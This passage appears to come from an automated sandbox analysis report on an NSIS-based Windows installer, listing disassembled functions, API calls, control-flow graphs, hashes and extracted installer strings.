                                          • CreatePopupMenu.USER32 ref: 00405376
                                          • AppendMenuW.USER32(00000000,00000000,00000001,00000000), ref: 0040538B
                                          • GetWindowRect.USER32(?,?), ref: 0040539E
                                          • TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 004053C0
                                          • SendMessageW.USER32(?,00001073,00000000,?), ref: 004053FB
                                          • OpenClipboard.USER32(00000000), ref: 0040540B
                                          • EmptyClipboard.USER32 ref: 00405411
                                          • GlobalAlloc.KERNEL32(00000042,00000000,?,?,00000000,?,00000000), ref: 0040541D
                                          • GlobalLock.KERNEL32(00000000), ref: 00405427
                                          • SendMessageW.USER32(?,00001073,00000000,?), ref: 0040543B
                                          • GlobalUnlock.KERNEL32(00000000), ref: 0040545D
                                          • SetClipboardData.USER32(0000000D,00000000), ref: 00405468
                                          • CloseClipboard.USER32 ref: 0040546E
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1747040442.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1747024973.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1747087962.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1747106689.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1747106689.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1747106689.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1747181228.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                          Similarity
                                          • API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlockVersionlstrlenwvsprintf
                                          • String ID: @rD$New install of "%s" to "%s"${
                                          • API String ID: 2110491804-2409696222
                                          • Opcode ID: f168db28b2c12902a58862b60cbdcc3c6e49ead995c60d9878de2ccec3fe74d8
                                          • Instruction ID: 480b9f2609884c7685ddca5963e0cfcc77f9e358d06567921943d8ab7e89b76b
                                          • Opcode Fuzzy Hash: f168db28b2c12902a58862b60cbdcc3c6e49ead995c60d9878de2ccec3fe74d8
                                          • Instruction Fuzzy Hash: 14B15B70800608FFDB11AFA0DD85EAE7B79EF44355F00803AFA45BA1A0CBB49A519F59
                                          Function 00403883 Relevance: 54.6, APIs: 22, Strings: 9, Instructions: 304filestringcomCOMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 305 403883-403919 #17 SetErrorMode OleInitialize call 4062fc SHGetFileInfoW call 406009 GetCommandLineW call 406009 GetModuleHandleW 312 403923-403937 call 405d06 CharNextW 305->312 313 40391b-40391e 305->313 316 4039ca-4039d0 312->316 313->312 317 4039d6 316->317 318 40393c-403942 316->318 319 4039f5-403a0d GetTempPathW call 4037cc 317->319 320 403944-40394a 318->320 321 40394c-403950 318->321 328 403a33-403a4d DeleteFileW call 403587 319->328 329 403a0f-403a2d GetWindowsDirectoryW lstrcatW call 4037cc 319->329 320->320 320->321 323 403952-403957 321->323 324 403958-40395c 321->324 323->324 326 4039b8-4039c5 call 405d06 324->326 327 40395e-403965 324->327 326->316 342 4039c7 326->342 331 403967-40396e 327->331 332 40397a-40398c call 403800 327->332 345 403acc-403adb call 403859 CoUninitialize 328->345 346 403a4f-403a55 328->346 329->328 329->345 333 403970-403973 331->333 334 403975 331->334 343 4039a1-4039b6 call 403800 332->343 344 40398e-403995 332->344 333->332 333->334 334->332 342->316 343->326 361 4039d8-4039f0 call 407d6e call 406009 343->361 348 403997-40399a 344->348 349 40399c 344->349 359 403ae1-403af1 call 405ca0 ExitProcess 345->359 360 403bce-403bd4 345->360 351 403ab5-403abc call 40592c 346->351 352 403a57-403a60 call 405d06 346->352 348->343 348->349 349->343 358 403ac1-403ac7 call 4060e7 351->358 362 403a79-403a7b 352->362 358->345 365 403c51-403c59 360->365 366 403bd6-403bf3 call 4062fc * 3 360->366 361->319 370 403a62-403a74 call 403800 362->370 371 403a7d-403a87 362->371 372 403c5b 365->372 373 403c5f 365->373 397 403bf5-403bf7 366->397 398 403c3d-403c48 ExitWindowsEx 366->398 370->371 384 403a76 370->384 378 403af7-403b11 lstrcatW lstrcmpiW 371->378 379 403a89-403a99 call 40677e 371->379 372->373 378->345 383 403b13-403b29 CreateDirectoryW SetCurrentDirectoryW 378->383 379->345 390 403a9b-403ab1 call 406009 * 2 379->390 387 403b36-403b56 call 406009 * 2 383->387 388 403b2b-403b31 call 406009 383->388 384->362 404 403b5b-403b77 call 406805 DeleteFileW 387->404 388->387 390->351 397->398 402 403bf9-403bfb 397->402 398->365 401 403c4a-403c4c call 40141d 398->401 401->365 402->398 406 403bfd-403c0f GetCurrentProcess 402->406 412 403bb8-403bc0 404->412 413 403b79-403b89 CopyFileW 404->413 406->398 411 403c11-403c33 406->411 411->398 412->404 414 403bc2-403bc9 call 406c68 412->414 413->412 415 403b8b-403bab call 406c68 call 406805 call 405c3f 413->415 414->345 415->412 425 403bad-403bb4 CloseHandle 415->425 425->412
                                          APIs
                                          • #17.COMCTL32 ref: 004038A2
                                          • SetErrorMode.KERNELBASE(00008001), ref: 004038AD
                                          • OleInitialize.OLE32(00000000), ref: 004038B4
                                            • Part of subcall function 004062FC: GetModuleHandleA.KERNEL32(?,?,00000020,004038C6,00000008), ref: 0040630A
                                            • Part of subcall function 004062FC: LoadLibraryA.KERNELBASE(?,?,?,00000020,004038C6,00000008), ref: 00406315
                                            • Part of subcall function 004062FC: GetProcAddress.KERNEL32(00000000), ref: 00406327
                                          • SHGetFileInfoW.SHELL32(00409264,00000000,?,000002B4,00000000), ref: 004038DC
                                            • Part of subcall function 00406009: lstrcpynW.KERNEL32(?,?,00002004,004038F1,0046ADC0,NSIS Error), ref: 00406016
                                          • GetCommandLineW.KERNEL32(0046ADC0,NSIS Error), ref: 004038F1
                                          • GetModuleHandleW.KERNEL32(00000000,004C30A0,00000000), ref: 00403904
                                          • CharNextW.USER32(00000000,004C30A0,00000020), ref: 0040392B
                                          • GetTempPathW.KERNEL32(00002004,004D70C8,00000000,00000020), ref: 00403A00
                                          • GetWindowsDirectoryW.KERNEL32(004D70C8,00001FFF), ref: 00403A15
                                          • lstrcatW.KERNEL32(004D70C8,\Temp), ref: 00403A21
                                          • DeleteFileW.KERNELBASE(004D30C0), ref: 00403A38
                                          • CoUninitialize.COMBASE(?), ref: 00403AD1
                                          • ExitProcess.KERNEL32 ref: 00403AF1
                                          • lstrcatW.KERNEL32(004D70C8,~nsu.tmp), ref: 00403AFD
                                          • lstrcmpiW.KERNEL32(004D70C8,004CF0B8,004D70C8,~nsu.tmp), ref: 00403B09
                                          • CreateDirectoryW.KERNEL32(004D70C8,00000000), ref: 00403B15
                                          • SetCurrentDirectoryW.KERNEL32(004D70C8), ref: 00403B1C
                                          • DeleteFileW.KERNEL32(004331E8,004331E8,?,00477008,00409204,00473000,?), ref: 00403B6D
                                          • CopyFileW.KERNEL32(004DF0D8,004331E8,00000001), ref: 00403B81
                                          • CloseHandle.KERNEL32(00000000,004331E8,004331E8,?,004331E8,00000000), ref: 00403BAE
                                          • GetCurrentProcess.KERNEL32(00000028,00000005,00000005,00000004,00000003), ref: 00403C04
                                          • ExitWindowsEx.USER32(00000002,00000000), ref: 00403C40
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1747040442.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1747024973.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1747087962.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1747106689.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1747106689.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1747106689.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1747181228.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                          Similarity
                                          • API ID: File$DirectoryHandle$CurrentDeleteExitModuleProcessWindowslstrcat$AddressCharCloseCommandCopyCreateErrorInfoInitializeLibraryLineLoadModeNextPathProcTempUninitializelstrcmpilstrcpyn
                                          • String ID: /D=$ _?=$Error launching installer$NCRC$NSIS Error$SeShutdownPrivilege$\Temp$~nsu.tmp$1C
                                          • API String ID: 2435955865-239407132
                                          • Opcode ID: b4c90e19bc4a522d6528af1b5983b0f211df9e73c6af6eb8e5ff34ebe7c06cb6
                                          • Instruction ID: 7cf1fa831aca86d96b8495533088dbe4cf0b0326274ef0a42366eb07f7c747b9
                                          • Opcode Fuzzy Hash: b4c90e19bc4a522d6528af1b5983b0f211df9e73c6af6eb8e5ff34ebe7c06cb6
                                          • Instruction Fuzzy Hash: C4A1B671544305BAD6207F629D4AF1B3EACAF0070AF15483FF585B61D2DBBC8A448B6E
                                          Function 004074BB Relevance: 5.4, APIs: 4, Instructions: 382COMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 820 4074bb-4074c0 821 4074c2-4074ef 820->821 822 40752f-407547 820->822 824 4074f1-4074f4 821->824 825 4074f6-4074fa 821->825 823 407aeb-407aff 822->823 829 407b01-407b17 823->829 830 407b19-407b2c 823->830 826 407506-407509 824->826 827 407502 825->827 828 4074fc-407500 825->828 831 407527-40752a 826->831 832 40750b-407514 826->832 827->826 828->826 833 407b33-407b3a 829->833 830->833 836 4076f6-407713 831->836 837 407516 832->837 838 407519-407525 832->838 834 407b61-407c68 833->834 835 407b3c-407b40 833->835 851 407350 834->851 852 407cec 834->852 840 407b46-407b5e 835->840 841 407ccd-407cd4 835->841 843 407715-407729 836->843 844 40772b-40773e 836->844 837->838 839 407589-4075b6 838->839 847 4075d2-4075ec 839->847 848 4075b8-4075d0 839->848 840->834 845 407cdd-407cea 841->845 849 407741-40774b 843->849 844->849 850 407cef-407cf6 845->850 853 4075f0-4075fa 847->853 848->853 854 40774d 849->854 855 4076ee-4076f4 849->855 856 407357-40735b 851->856 857 40749b-4074b6 851->857 858 40746d-407471 851->858 859 4073ff-407403 851->859 852->850 862 407600 853->862 863 407571-407577 853->863 864 407845-4078a1 854->864 865 4076c9-4076cd 854->865 855->836 861 407692-40769c 855->861 856->845 866 407361-40736e 856->866 857->823 871 407c76-407c7d 858->871 872 407477-40748b 858->872 877 407409-407420 859->877 878 407c6d-407c74 859->878 867 4076a2-4076c4 861->867 868 407c9a-407ca1 861->868 880 407556-40756e 862->880 881 407c7f-407c86 862->881 869 40762a-407630 863->869 870 40757d-407583 863->870 864->823 873 407c91-407c98 865->873 874 4076d3-4076eb 865->874 866->852 882 407374-4073ba 866->882 867->864 868->845 883 40768e 869->883 884 407632-40764f 869->884 870->839 870->883 871->845 879 40748e-407496 872->879 873->845 874->855 885 407423-407427 877->885 878->845 879->858 889 407498 879->889 880->863 881->845 887 4073e2-4073e4 882->887 888 4073bc-4073c0 882->888 883->861 890 407651-407665 884->890 891 407667-40767a 884->891 885->859 886 407429-40742f 885->886 893 407431-407438 886->893 894 407459-40746b 886->894 897 4073f5-4073fd 887->897 898 4073e6-4073f3 887->898 895 4073c2-4073c5 GlobalFree 888->895 896 4073cb-4073d9 GlobalAlloc 888->896 889->857 892 40767d-407687 890->892 891->892 892->869 899 407689 892->899 900 407443-407453 GlobalAlloc 893->900 901 40743a-40743d GlobalFree 893->901 894->879 895->896 896->852 902 4073df 896->902 897->885 898->897 898->898 904 407c88-407c8f 899->904 905 40760f-407627 899->905 900->852 900->894 901->900 902->887 904->845 905->869
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1747040442.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1747024973.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1747087962.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1747106689.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1747106689.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1747106689.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1747181228.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 40903ab5852a4d5be4c36b37cb9ac035c10bc9e934730a02f9966fb4d26bd2b9
                                          • Instruction ID: b44593247c4c050b0e646bb53675e7b1a8962b0b92449cff70e8ee1879f4dc4f
                                          • Opcode Fuzzy Hash: 40903ab5852a4d5be4c36b37cb9ac035c10bc9e934730a02f9966fb4d26bd2b9
                                          • Instruction Fuzzy Hash: 00F14871908249DBDF18CF28C8946E93BB1FF44345F14852AFD5A9B281D338E986DF86
                                          Function 004062FC Relevance: 4.5, APIs: 3, Instructions: 18libraryloaderCOMMON
                                          Download Yara Rule
                                          APIs
                                          • GetModuleHandleA.KERNEL32(?,?,00000020,004038C6,00000008), ref: 0040630A
                                          • LoadLibraryA.KERNELBASE(?,?,?,00000020,004038C6,00000008), ref: 00406315
                                          • GetProcAddress.KERNEL32(00000000), ref: 00406327
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1747040442.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1747024973.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1747087962.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1747106689.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1747106689.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1747106689.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1747181228.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                          Similarity
                                          • API ID: AddressHandleLibraryLoadModuleProc
                                          • String ID:
                                          • API String ID: 310444273-0
                                          • Opcode ID: a32725a6e723fbcd4130456278775f3bec070c67c36dcd31cef0056e0dec9b78
                                          • Instruction ID: 23f85fcbdf3119ad7ff9d94b99dcad510d7c567b01d836bd9cab37df641e0753
                                          • Opcode Fuzzy Hash: a32725a6e723fbcd4130456278775f3bec070c67c36dcd31cef0056e0dec9b78
                                          • Instruction Fuzzy Hash: 53D0123120010597C6001B65AE0895F776CEF95611707803EF542F3132EB34D415AAEC
                                          Function 004062D5 Relevance: 3.0, APIs: 2, Instructions: 14fileCOMMON
                                          Download Yara Rule
                                          APIs
                                          • FindFirstFileW.KERNELBASE(004572C0,0045BEC8,004572C0,004067CE,004572C0), ref: 004062E0
                                          • FindClose.KERNEL32(00000000), ref: 004062EC
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1747040442.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1747024973.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1747087962.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1747106689.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1747106689.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1747106689.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1747181228.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                          Similarity
                                          • API ID: Find$CloseFileFirst
                                          • String ID:
                                          • API String ID: 2295610775-0
                                          • Opcode ID: c6f116a51c08f79c55c0589ec24d04b7eaebe21ecc1702d782a9edd0eda53026
                                          • Instruction ID: 3dd5e1b78c12f0f437ff376ab6b0e1f90f8becb0d3509d6a9a7f52ed6ae53baf
                                          • Opcode Fuzzy Hash: c6f116a51c08f79c55c0589ec24d04b7eaebe21ecc1702d782a9edd0eda53026
                                          • Instruction Fuzzy Hash: 7AD0C9315041205BC25127386E0889B6A589F163723258A7AB5A6E11E0CB388C2296A8
                                          Function 00405479 Relevance: 58.1, APIs: 32, Strings: 1, Instructions: 345windowstringCOMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 56 405479-40548b 57 405491-405497 56->57 58 4055cd-4055dc 56->58 57->58 59 40549d-4054a6 57->59 60 40562b-405640 58->60 61 4055de-405626 GetDlgItem * 2 call 403d3f SetClassLongW call 40141d 58->61 62 4054a8-4054b5 SetWindowPos 59->62 63 4054bb-4054be 59->63 65 405680-405685 call 403daf 60->65 66 405642-405645 60->66 61->60 62->63 68 4054c0-4054d2 ShowWindow 63->68 69 4054d8-4054de 63->69 74 40568a-4056a5 65->74 71 405647-405652 call 40139d 66->71 72 405678-40567a 66->72 68->69 75 4054e0-4054f5 DestroyWindow 69->75 76 4054fa-4054fd 69->76 71->72 93 405654-405673 SendMessageW 71->93 72->65 73 405920 72->73 81 405922-405929 73->81 79 4056a7-4056a9 call 40141d 74->79 80 4056ae-4056b4 74->80 82 4058fd-405903 75->82 84 405510-405516 76->84 85 4054ff-40550b SetWindowLongW 76->85 79->80 89 4056ba-4056c5 80->89 90 4058de-4058f7 DestroyWindow KiUserCallbackDispatcher 80->90 82->73 87 405905-40590b 82->87 91 4055b9-4055c8 call 403dca 84->91 92 40551c-40552d GetDlgItem 84->92 85->81 87->73 95 40590d-405916 ShowWindow 87->95 89->90 96 4056cb-405718 call 406805 call 403d3f * 3 GetDlgItem 89->96 90->82 91->81 97 40554c-40554f 92->97 98 40552f-405546 SendMessageW IsWindowEnabled 92->98 93->81 95->73 126 405723-40575f ShowWindow KiUserCallbackDispatcher call 403d85 EnableWindow 96->126 127 40571a-405720 96->127 101 405551-405552 97->101 102 405554-405557 97->102 98->73 98->97 103 405582-405587 call 403d18 101->103 104 405565-40556a 102->104 105 405559-40555f 102->105 103->91 107 4055a0-4055b3 SendMessageW 104->107 109 40556c-405572 104->109 105->107 108 405561-405563 105->108 107->91 108->103 112 405574-40557a call 40141d 109->112 113 405589-405592 call 40141d 109->113 122 405580 112->122 113->91 123 405594-40559e 113->123 122->103 123->122 130 405761-405762 126->130 131 405764 126->131 127->126 132 405766-405794 GetSystemMenu EnableMenuItem SendMessageW 130->132 131->132 133 405796-4057a7 SendMessageW 132->133 134 4057a9 132->134 135 4057af-4057ed call 403d98 call 406009 lstrlenW call 406805 SetWindowTextW call 40139d 133->135 134->135 135->74 144 4057f3-4057f5 135->144 144->74 145 4057fb-4057ff 144->145 146 405801-405807 145->146 147 40581e-405832 DestroyWindow 145->147 146->73 148 40580d-405813 146->148 147->82 149 405838-405865 CreateDialogParamW 147->149 148->74 150 405819 148->150 149->82 151 40586b-4058c2 call 403d3f GetDlgItem GetWindowRect ScreenToClient SetWindowPos call 40139d 149->151 150->73 151->73 156 4058c4-4058d7 ShowWindow call 403daf 151->156 158 4058dc 156->158 158->82
                                          APIs
                                          • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 004054B5
                                          • ShowWindow.USER32(?), ref: 004054D2
                                          • DestroyWindow.USER32 ref: 004054E6
                                          • SetWindowLongW.USER32(?,00000000,00000000), ref: 00405502
                                          • GetDlgItem.USER32(?,?), ref: 00405523
                                          • SendMessageW.USER32(00000000,000000F3,00000000,00000000), ref: 00405537
                                          • IsWindowEnabled.USER32(00000000), ref: 0040553E
                                          • GetDlgItem.USER32(?,00000001), ref: 004055ED
                                          • GetDlgItem.USER32(?,00000002), ref: 004055F7
                                          • SetClassLongW.USER32(?,000000F2,?), ref: 00405611
                                          • SendMessageW.USER32(0000040F,00000000,00000001,?), ref: 00405662
                                          • GetDlgItem.USER32(?,00000003), ref: 00405708
                                          • ShowWindow.USER32(00000000,?), ref: 0040572A
                                          • KiUserCallbackDispatcher.NTDLL(?,?), ref: 0040573C
                                          • EnableWindow.USER32(?,?), ref: 00405757
                                          • GetSystemMenu.USER32(?,00000000,0000F060,00000001), ref: 0040576D
                                          • EnableMenuItem.USER32(00000000), ref: 00405774
                                          • SendMessageW.USER32(?,000000F4,00000000,00000001), ref: 0040578C
                                          • SendMessageW.USER32(?,00000401,00000002,00000000), ref: 0040579F
                                          • lstrlenW.KERNEL32(00447240,?,00447240,0046ADC0), ref: 004057C8
                                          • SetWindowTextW.USER32(?,00447240), ref: 004057DC
                                          • ShowWindow.USER32(?,0000000A), ref: 00405910
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1747040442.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1747024973.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1747087962.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1747106689.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1747106689.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1747106689.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1747181228.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                          Similarity
                                          • API ID: Window$Item$MessageSend$Show$EnableLongMenu$CallbackClassDestroyDispatcherEnabledSystemTextUserlstrlen
                                          • String ID: @rD
                                          • API String ID: 3282139019-3814967855
                                          • Opcode ID: 892c705fd8619986465a6960d4e81f7d1e8168c1c52714a2b5abc7a1d7472251
                                          • Instruction ID: 0f9b988f21b44e482dc064b3562f20aa73efc2902ac8c6ffeb9ddf27563d0ddb
                                          • Opcode Fuzzy Hash: 892c705fd8619986465a6960d4e81f7d1e8168c1c52714a2b5abc7a1d7472251
                                          • Instruction Fuzzy Hash: D8C1C371500A04EBDB216F61EE49E2B3BA9EB45345F00093EF551B12F0DB799891EF2E
                                          Function 004015A0 Relevance: 56.4, APIs: 15, Strings: 17, Instructions: 351sleepfilewindowCOMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 159 4015a0-4015f4 160 4030e3-4030ec 159->160 161 4015fa 159->161 185 4030ee-4030f2 160->185 163 401601-401611 call 4062a3 161->163 164 401742-40174f 161->164 165 401962-40197d call 40145c GetFullPathNameW 161->165 166 4019ca-4019e6 call 40145c SearchPathW 161->166 167 40176e-401794 call 40145c call 4062a3 SetFileAttributesW 161->167 168 401650-40166d call 40137e call 4062a3 call 40139d 161->168 169 4017b1-4017d8 call 40145c call 4062a3 call 405d59 161->169 170 401672-401686 call 40145c call 4062a3 161->170 171 401693-4016ac call 401446 call 4062a3 161->171 172 401715-401731 161->172 173 401616-40162d call 40145c call 4062a3 call 404f72 161->173 174 4016d6-4016db 161->174 175 401736-4030de 161->175 176 401897-4018a7 call 40145c call 4062d5 161->176 177 4018db-401910 call 40145c * 3 call 4062a3 MoveFileW 161->177 178 40163c-401645 161->178 179 4016bd-4016d1 call 4062a3 SetForegroundWindow 161->179 163->185 189 401751-401755 ShowWindow 164->189 190 401758-40175f 164->190 224 4019a3-4019a8 165->224 225 40197f-401984 165->225 166->160 217 4019ec-4019f8 166->217 167->160 242 40179a-4017a6 call 4062a3 167->242 168->185 264 401864-40186c 169->264 265 4017de-4017fc call 405d06 CreateDirectoryW 169->265 243 401689-40168e call 404f72 170->243 248 4016b1-4016b8 Sleep 171->248 249 4016ae-4016b0 171->249 172->185 186 401632-401637 173->186 183 401702-401710 174->183 184 4016dd-4016fd call 401446 174->184 175->160 219 4030de call 405f51 175->219 244 4018c2-4018d6 call 4062a3 176->244 245 4018a9-4018bd call 4062a3 176->245 272 401912-401919 177->272 273 40191e-401921 177->273 178->186 187 401647-40164e PostQuitMessage 178->187 179->160 183->160 184->160 186->185 187->186 189->190 190->160 208 401765-401769 ShowWindow 190->208 208->160 217->160 219->160 228 4019af-4019b2 224->228 225->228 235 401986-401989 225->235 228->160 238 4019b8-4019c5 GetShortPathNameW 228->238 235->228 246 40198b-401993 call 4062d5 235->246 238->160 259 4017ab-4017ac 242->259 243->160 244->185 245->185 246->224 269 401995-4019a1 call 406009 246->269 248->160 249->248 259->160 267 401890-401892 264->267 268 40186e-40188b call 404f72 call 406009 SetCurrentDirectoryW 264->268 277 401846-40184e call 4062a3 265->277 278 4017fe-401809 GetLastError 265->278 267->243 268->160 269->228 272->243 279 401923-40192b call 4062d5 273->279 280 40194a-401950 273->280 292 401853-401854 277->292 283 401827-401832 GetFileAttributesW 278->283 284 40180b-401825 GetLastError call 4062a3 278->284 279->280 298 40192d-401948 call 406c68 call 404f72 279->298 288 401957-40195d call 4062a3 280->288 290 401834-401844 call 4062a3 283->290 291 401855-40185e 283->291 284->291 288->259 290->292 291->264 291->265 292->291 298->288
                                          APIs
                                          • PostQuitMessage.USER32(00000000), ref: 00401648
                                          • Sleep.KERNELBASE(00000000,?,00000000,00000000,00000000), ref: 004016B2
                                          • SetForegroundWindow.USER32(?), ref: 004016CB
                                          • ShowWindow.USER32(?), ref: 00401753
                                          • ShowWindow.USER32(?), ref: 00401767
                                          • SetFileAttributesW.KERNEL32(00000000,00000000,?,000000F0), ref: 0040178C
                                          • CreateDirectoryW.KERNELBASE(?,00000000,00000000,0000005C,?,?,?,000000F0,?,000000F0), ref: 004017F4
                                          • GetLastError.KERNEL32(?,?,000000F0,?,000000F0), ref: 004017FE
                                          • GetLastError.KERNEL32(?,?,000000F0,?,000000F0), ref: 0040180B
                                          • GetFileAttributesW.KERNELBASE(?,?,?,000000F0,?,000000F0), ref: 0040182A
                                          • SetCurrentDirectoryW.KERNELBASE(?,004CB0B0,?,000000E6,0040F0D0,?,?,?,000000F0,?,000000F0), ref: 00401885
                                          • MoveFileW.KERNEL32(00000000,?), ref: 00401908
                                          • GetFullPathNameW.KERNEL32(00000000,00002004,00000000,?,00000000,000000E3,0040F0D0,?,00000000,00000000,?,?,?,?,?,000000F0), ref: 00401975
                                          • GetShortPathNameW.KERNEL32(00000000,00000000,00002004), ref: 004019BF
                                          • SearchPathW.KERNELBASE(00000000,00000000,00000000,00002004,00000000,?,000000FF,?,00000000,00000000,?,?,?,?,?,000000F0), ref: 004019DE
                                          Strings
                                          • Rename: %s, xrefs: 004018F8
                                          • Jump: %d, xrefs: 00401602
                                          • IfFileExists: file "%s" does not exist, jumping %d, xrefs: 004018C6
                                          • SetFileAttributes failed., xrefs: 004017A1
                                          • Call: %d, xrefs: 0040165A
                                          • BringToFront, xrefs: 004016BD
                                          • detailprint: %s, xrefs: 00401679
                                          • CreateDirectory: can't create "%s" - a file already exists, xrefs: 00401837
                                          • Rename on reboot: %s, xrefs: 00401943
                                          • Rename failed: %s, xrefs: 0040194B
                                          • CreateDirectory: "%s" created, xrefs: 00401849
                                          • CreateDirectory: "%s" (%d), xrefs: 004017BF
                                          • IfFileExists: file "%s" exists, jumping %d, xrefs: 004018AD
                                          • Aborting: "%s", xrefs: 0040161D
                                          • SetFileAttributes: "%s":%08X, xrefs: 0040177B
                                          • Sleep(%d), xrefs: 0040169D
                                          • CreateDirectory: can't create "%s" (err=%d), xrefs: 00401815
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1747040442.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1747024973.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1747087962.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1747106689.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1747106689.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1747106689.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1747181228.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                          Similarity
                                          • API ID: FilePathWindow$AttributesDirectoryErrorLastNameShow$CreateCurrentForegroundFullMessageMovePostQuitSearchShortSleep
